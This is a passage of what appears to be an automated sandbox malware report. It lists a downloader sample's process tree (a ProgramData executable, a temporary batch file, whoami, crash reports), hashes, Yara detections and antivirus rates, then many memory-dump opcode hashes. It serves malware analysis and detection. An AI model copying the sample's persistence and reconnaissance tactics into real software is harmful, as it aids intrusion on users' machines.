                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000000.1687370695.00000258F28F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:2
                          Start time:08:55:51
                          Start date:25/06/2024
                          Path:C:\ProgramData\uovan\svrreve.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\ProgramData\uovan\svrreve.exe"
                          Imagebase:0x26dbeea0000
                          File size:1'972'736 bytes
                          MD5 hash:7DDECCF7C147EA2B90426AEB43277096
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.2289800804.0000026DC0DA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\ProgramData\uovan\svrreve.exe, Author: Joe Security
                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\uovan\svrreve.exe, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 45%, ReversingLabs
                          • Detection: 56%, Virustotal
                          Reputation:low
                          Has exited:true

                          Target ID:3
                          Start time:08:55:51
                          Start date:25/06/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFD97.tmp.bat""
                          Imagebase:0x7ff6d07c0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:4
                          Start time:08:55:51
                          Start date:25/06/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:5
                          Start time:08:55:51
                          Start date:25/06/2024
                          Path:C:\Windows\System32\timeout.exe
                          Wow64 process (32bit):false
                          Commandline:timeout 7
                          Imagebase:0x7ff634590000
                          File size:32'768 bytes
                          MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          Target ID:8
                          Start time:08:55:58
                          Start date:25/06/2024
                          Path:C:\Windows\System32\whoami.exe
                          Wow64 process (32bit):true
                          Commandline:whoami
                          Imagebase:0x9b0000
                          File size:73'728 bytes
                          MD5 hash:A4A6924F3EAF97981323703D38FD99C4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          Target ID:9
                          Start time:08:56:13
                          Start date:25/06/2024
                          Path:C:\ProgramData\uovan\svrreve.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\ProgramData\uovan\svrreve.exe"
                          Imagebase:0x1dd54b90000
                          File size:1'972'736 bytes
                          MD5 hash:7DDECCF7C147EA2B90426AEB43277096
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.2301901265.000001DD56A61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:12
                          Start time:08:56:15
                          Start date:25/06/2024
                          Path:C:\Windows\System32\WerFault.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\WerFault.exe -u -p 7924 -s 820
                          Imagebase:0x7ff697450000
                          File size:570'736 bytes
                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:13
                          Start time:08:56:21
                          Start date:25/06/2024
                          Path:C:\ProgramData\uovan\svrreve.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\ProgramData\uovan\svrreve.exe"
                          Imagebase:0x1b08d950000
                          File size:1'972'736 bytes
                          MD5 hash:7DDECCF7C147EA2B90426AEB43277096
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.2276827527.000001B08F751000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:15
                          Start time:08:56:21
                          Start date:25/06/2024
                          Path:C:\Windows\System32\WerFault.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\WerFault.exe -u -p 8076 -s 832
                          Imagebase:0x7ff697450000
                          File size:570'736 bytes
                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:17
                          Start time:08:56:26
                          Start date:25/06/2024
                          Path:C:\Windows\System32\WerFault.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\WerFault.exe -u -p 7536 -s 2476
                          Imagebase:0x7ff697450000
                          File size:570'736 bytes
                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4647cfcf0ce73736273d2009fbef239f4adade278d3439e19cc7fff82b9380e1
                            • Instruction ID: c8779990ef80d0b052d0514b1465f737dc5fb918b044620afec07cce6a87a8df
                            • Opcode Fuzzy Hash: 4647cfcf0ce73736273d2009fbef239f4adade278d3439e19cc7fff82b9380e1
                            • Instruction Fuzzy Hash: 705160B090A6898FD745EBA8D469BADBFF0EF16321F4410EED04AEB1B2C66C5845C705
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID: ;/M
                            • API String ID: 0-420482631
                            • Opcode ID: 9dd0610e7521915a687e79ffd6bb443b4e3ce0f437b87a8874d4eb1bd494ceba
                            • Instruction ID: cd88c07f80ee4414906c791241a5fc3a30168144f0a17d6b4a6277cc1b96c20e
                            • Opcode Fuzzy Hash: 9dd0610e7521915a687e79ffd6bb443b4e3ce0f437b87a8874d4eb1bd494ceba
                            • Instruction Fuzzy Hash: 61B1BE6160E9CA6FE742ABB864755E9BFF0DF4B22071805EAC499DF167CA5D6883C300
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID: >M_^
                            • API String ID: 0-4160910197
                            • Opcode ID: 98f6ddd64215a2aaa3c6c0c56922073562cc46ce6e44b5a34a9144fe3e4f6677
                            • Instruction ID: 00c8ef06c21e9d9958cc070738f259cdc9cf77f53c345b9805843a513aa8b3fc
                            • Opcode Fuzzy Hash: 98f6ddd64215a2aaa3c6c0c56922073562cc46ce6e44b5a34a9144fe3e4f6677
                            • Instruction Fuzzy Hash: 7651D671A0E94D9FDF91EBACD865AECBBF0FF59310F0401AAD049DB1A2DA756841C740
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6743d4640e44695a2d35c2ab6c827bf8df5fe67e3325e9254dbae855157a3b82
                            • Instruction ID: 7c89f7dade23e6ac22d82660fa7daf116a0ce035b073fc4a8a1fba79718caadf
                            • Opcode Fuzzy Hash: 6743d4640e44695a2d35c2ab6c827bf8df5fe67e3325e9254dbae855157a3b82
                            • Instruction Fuzzy Hash: 28C10B7090E68C5FDB91DFE894666EDBFF1EF5A310F4411AAC08DEB262CA785841C740
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fef82b0d5c8c4de9cd77a9654fd7198cf6bc110658489df8b736395b0ccd1570
                            • Instruction ID: 33e7a247c32645c51b9d49ac62fd18f35917654d52186df6a450982f8a676197
                            • Opcode Fuzzy Hash: fef82b0d5c8c4de9cd77a9654fd7198cf6bc110658489df8b736395b0ccd1570
                            • Instruction Fuzzy Hash: 7C81B170A0A55E8FDBA8EF64C4A46F977B0FF65310F0445BAC019D32E1CA78AA85CB40
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 56e997a7c3248cfc8d2915e490e8ed942fd0faef7754012f20613ee5fe73a1c6
                            • Instruction ID: fa6dc092b8d49054274356b24696f4d8fdec21faca05bed4eab14992c6b789b9
                            • Opcode Fuzzy Hash: 56e997a7c3248cfc8d2915e490e8ed942fd0faef7754012f20613ee5fe73a1c6
                            • Instruction Fuzzy Hash: 0341D570A0994D8FDF91EBACD469AEDBBF0FF59310F0401AAD049EB1A2DA75A841C740
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a34adb739c4e0974e8e7d7237b7df4f9238161bfc872a75e0fbf51025084c97b
                            • Instruction ID: 5790b980c418af5a74c3fb438568364a39f2eb489e9bc583c4eacc7b1b782844
                            • Opcode Fuzzy Hash: a34adb739c4e0974e8e7d7237b7df4f9238161bfc872a75e0fbf51025084c97b
                            • Instruction Fuzzy Hash: 3641557090DA8D9FDB81EBA8C859AED7FF1FF5A310F4500AAD049DB172C6799845C740
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a77370db2894ed31b3f7634edafdfcb92de169bc3422484580fe56a7c3c7f386
                            • Instruction ID: f794d55aeb8ccc9c334f2e366cdf6f4d21877c1fe3f2aa4d8e57c347d1845fee
                            • Opcode Fuzzy Hash: a77370db2894ed31b3f7634edafdfcb92de169bc3422484580fe56a7c3c7f386
                            • Instruction Fuzzy Hash: B4410430E0E64D8FDB95DBA8D865AED7BF0FF59310F04117AE049E32A2CA785942C780
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 075a216212ac9b680caa8667733819a88c67d6b02d878a873e266fc72df63e2a
                            • Instruction ID: 04df95ad1241743bf63079bb85ce764bc2a59b7dcba032cf7026e8ce072c97fc
                            • Opcode Fuzzy Hash: 075a216212ac9b680caa8667733819a88c67d6b02d878a873e266fc72df63e2a
                            • Instruction Fuzzy Hash: C4413221A0E68D0FE391DBB89878AE87BE0EF55220F1405FED099CB0A3CD5C2406C301
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5431227b739f9720e94dae657c3978e9b0e79e2347c67e0dcc9281de8a90116e
                            • Instruction ID: 6180e9ea5189a1922c737c377e41ec50fa4ad03402f033879a5390fc96a27063
                            • Opcode Fuzzy Hash: 5431227b739f9720e94dae657c3978e9b0e79e2347c67e0dcc9281de8a90116e
                            • Instruction Fuzzy Hash: 1F418171E0AA1D8FDBA5DF588464BE8B7F1EF15300F5510B9C05EE72A1CA786A85CB00
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8fc11d4fef62a9dad711272c56a099ecae0fcae23420b9d52a2c323263d6148c
                            • Instruction ID: d6fb5f33d074884202cf829154ab3bd0cf6c8a3e39cdcbba84a644f0d4d7ff45
                            • Opcode Fuzzy Hash: 8fc11d4fef62a9dad711272c56a099ecae0fcae23420b9d52a2c323263d6148c
                            • Instruction Fuzzy Hash: D7415E70A0994C9FDF90EBACD859BADBBF1FF59310F4501AAD049EB261CB75A841CB40
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: da551bc0d23893569242c90e9fd5edacbbd1c38a0a15dbb24f23a6f0de2f71b5
                            • Instruction ID: 6b606c7ca63091c1573477d2fe17f4a66c448ccf88f797b3ae2a2204ab3cae39
                            • Opcode Fuzzy Hash: da551bc0d23893569242c90e9fd5edacbbd1c38a0a15dbb24f23a6f0de2f71b5
                            • Instruction Fuzzy Hash: 37318D30E0991D8FDBA4EB98D865AFDB7F1FF59310F04153AE01DE3291CA74A8418780
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 84c50bed6ea6a6d3306333a131f8a76ab65de47e0cfee8522c6d103077dc47eb
                            • Instruction ID: 8a9fd437edccaf3423a0c235012eb11fb8fb39d4966ef2630be787c71dce4ac8
                            • Opcode Fuzzy Hash: 84c50bed6ea6a6d3306333a131f8a76ab65de47e0cfee8522c6d103077dc47eb
                            • Instruction Fuzzy Hash: 1531AA12B0F2DA5AE363777C68B15D53B60EF52618B0F41F3D0D98D0E7ED09154A839A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1c3b7c263124f9e953e0b0a446b6035b085872ff73808ae9a8596bc7ab8d2184
                            • Instruction ID: 3a348d27adad51ac04c33d46f01ee4edc2a2572a3e9e320952ee92a3a1f5a07a
                            • Opcode Fuzzy Hash: 1c3b7c263124f9e953e0b0a446b6035b085872ff73808ae9a8596bc7ab8d2184
                            • Instruction Fuzzy Hash: 5B316F71A0A65E8FDB94DF64C8A4AF977F1FF25301F1544BAC00EA31E2CA795585CB40
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6a211ada02a8ac3fd03a550277a52ebff33d3bc547b127b66e612d1f10700577
                            • Instruction ID: 200b42e581c83a1c99023494ab05621c1eb32272307fee6d587bb0d5a2437327
                            • Opcode Fuzzy Hash: 6a211ada02a8ac3fd03a550277a52ebff33d3bc547b127b66e612d1f10700577
                            • Instruction Fuzzy Hash: C221CC12B0E6DB4AF37377AC64F19E53B60EF12618F0E51F3D0DA490E7AC0A194A8295
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 03d86a6b85c42df1380b238e2a43b7bae8f1a2d3bec1de3f610f0282f66e2015
                            • Instruction ID: b5252dade434c2808399cff5eaffd7be2c46486f1a2a53f40a79822d72c2621d
                            • Opcode Fuzzy Hash: 03d86a6b85c42df1380b238e2a43b7bae8f1a2d3bec1de3f610f0282f66e2015
                            • Instruction Fuzzy Hash: E321DC30B0551D9FEBA5EB28D861BE9B3B2EF4A305F4110F8D00DD3295CE75AD818B01
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e86ce33c0a7774cde7c159fd3eb19afda2b6ff6a61f00e9b6fad1f7a31b7d7bb
                            • Instruction ID: 3dacdb07a8aa5a6ac0afc5d20dbff1cae01fba5c00bca8460beae5b87d5bc842
                            • Opcode Fuzzy Hash: e86ce33c0a7774cde7c159fd3eb19afda2b6ff6a61f00e9b6fad1f7a31b7d7bb
                            • Instruction Fuzzy Hash: 4321073188F3C94FD3635BA08C246D13FA5EF87214F0A01EAE0D9CB0A3C66D5A5AC761
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: aea2c6a572c3b67015ae4513a78af6c6ccf6014b1a8b0906a2ef6c16047793d0
                            • Instruction ID: 7881ce0dbe6ddee290ab9ccfe002749010da2193f44b746ee6a21ced7c46e8f6
                            • Opcode Fuzzy Hash: aea2c6a572c3b67015ae4513a78af6c6ccf6014b1a8b0906a2ef6c16047793d0
                            • Instruction Fuzzy Hash: 89216D31E0A61D8FEBA5EB68D8647E87BB1FF49311F0500AAD019D71A1DB786A85CB01
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d58427a22da1613b0597271a1b541892b116954876a44c4cfa433a5de4d05c69
                            • Instruction ID: 63984e14103153c0fe864c28554e2b26d74d09292ea095b3ee8c9a78f44a14a1
                            • Opcode Fuzzy Hash: d58427a22da1613b0597271a1b541892b116954876a44c4cfa433a5de4d05c69
                            • Instruction Fuzzy Hash: 4911082094D68E0FE346AB7458695F97FF0DF46210F0504FBD469CB0E7CA6C5546C341
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cd98a7773dd8703d66f6bca37358ac1b5de39060269c6f8d49dbe2fef24889d5
                            • Instruction ID: eddebb75ae0109a0f6a86d411f2fd58662adf85a02cd1a9c00a9251e9287c004
                            • Opcode Fuzzy Hash: cd98a7773dd8703d66f6bca37358ac1b5de39060269c6f8d49dbe2fef24889d5
                            • Instruction Fuzzy Hash: C111C370A0A65E4FD7A8DF6884A46FAB7B0FF19320F105BB9C06DD72A2C9785541CB00
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 47b569a521c2b0933896f653f6e8a8bf182e8634b415ff584d7904fc41d04561
                            • Instruction ID: 16aec69418e6afe98a9870f376158de74425848e8d99b29ff0f4ec6d0a55388a
                            • Opcode Fuzzy Hash: 47b569a521c2b0933896f653f6e8a8bf182e8634b415ff584d7904fc41d04561
                            • Instruction Fuzzy Hash: CE118B2188F3C65FD3535BB08C259D27FA49F87214B0E01EAE0D5CB0A3C59E4A5BC762
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e0e210ad8e8c9f39870f0ae67c350f5baa4ae3648175667520506edeb05d8bf4
                            • Instruction ID: 5cef8646c09f095ab157c6811f8342f23498cd079e5360142b744ed060d1ba41
                            • Opcode Fuzzy Hash: e0e210ad8e8c9f39870f0ae67c350f5baa4ae3648175667520506edeb05d8bf4
                            • Instruction Fuzzy Hash: 57019212A0E6CA5AE36377A864B14E53F70EF03608F0A51F7D4DA890E7AD4A19498256
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e159c1a20824e2c728f9b8364af22f3f6620b7e1c365a429627ca2368d3049b0
                            • Instruction ID: 5728fc0a8dfe0ce41a23e2c296e11ff367684355bbf70b888caaf6f64eeb477f
                            • Opcode Fuzzy Hash: e159c1a20824e2c728f9b8364af22f3f6620b7e1c365a429627ca2368d3049b0
                            • Instruction Fuzzy Hash: 6711A16080A68C4FD752EBB8D869BD9BFE0EF16310F4500EED046DB1B2DB6C5445C702
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0989a7c672119b3f8fb0502c53941f720da4024f9a7405de6acb9802ebfdd5f9
                            • Instruction ID: 3dd5896425358517d747954c91b37f828cf813cd630b4ccefcea03561d2c4d0f
                            • Opcode Fuzzy Hash: 0989a7c672119b3f8fb0502c53941f720da4024f9a7405de6acb9802ebfdd5f9
                            • Instruction Fuzzy Hash: 06012B3194E7CE1FD752AB7888795E97FF0EF16250F0A00E6E4AAC70A3DD991946C311
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ad1bcec9842a7992df10dbb1af399d5312cd49253ea35117fa8a65d785decb3e
                            • Instruction ID: 5f742864cd8a7cf52e30aca8cbf5b3becb8d4bdcf569385c0f457f8d1f62a4d0
                            • Opcode Fuzzy Hash: ad1bcec9842a7992df10dbb1af399d5312cd49253ea35117fa8a65d785decb3e
                            • Instruction Fuzzy Hash: 7001F931D0E68E4FE795EBA488695F97FA0EF55300F4504FAD869C70A2DE285544C701
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9b829a5d2ce73f69f7c8813b69697d1e08ee942a083fb6a978707b63188e0c8c
                            • Instruction ID: 4378c10d55725f6d2f16113261e0dc024ec6ccacaee4f4a181eed28e334c6e29
                            • Opcode Fuzzy Hash: 9b829a5d2ce73f69f7c8813b69697d1e08ee942a083fb6a978707b63188e0c8c
                            • Instruction Fuzzy Hash: 8D01DF31E0E64D8FDB92ABA4C8256EE7BB1FF55301F0100BBD009E61E2DE382644C751
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1f2a80014dac3b9d3eb83783e185a890edaeec540a5a666e7f9925eb9600fd78
                            • Instruction ID: 2ee674542df62456c0a7e2fe42b9d7a5904572ef7b289c797e77c03a4280bd5b
                            • Opcode Fuzzy Hash: 1f2a80014dac3b9d3eb83783e185a890edaeec540a5a666e7f9925eb9600fd78
                            • Instruction Fuzzy Hash: 4901C871E056188FEB94DB58D8A5BE87BB1FF58301F0400EAD05AD72A1DA786A85CF01
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bf88537d4b2b9ab2a41dd2ff7ed6c22cd49e233bd4164955ee48243cdd3320de
                            • Instruction ID: 1220d5dc2fa62eeba0895382c5299056ec5362676cba9ddd3b3d4fe1bf4f0eb1
                            • Opcode Fuzzy Hash: bf88537d4b2b9ab2a41dd2ff7ed6c22cd49e233bd4164955ee48243cdd3320de
                            • Instruction Fuzzy Hash: 1AF08C12A0E7CD4EE76323A818B10E43F60EF03104F0A11F7D0D98A0E398595A498296
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8edb2084d7acefd27ac83791b9a0fb48fe9a3751335f21b4a1527f6e5019135c
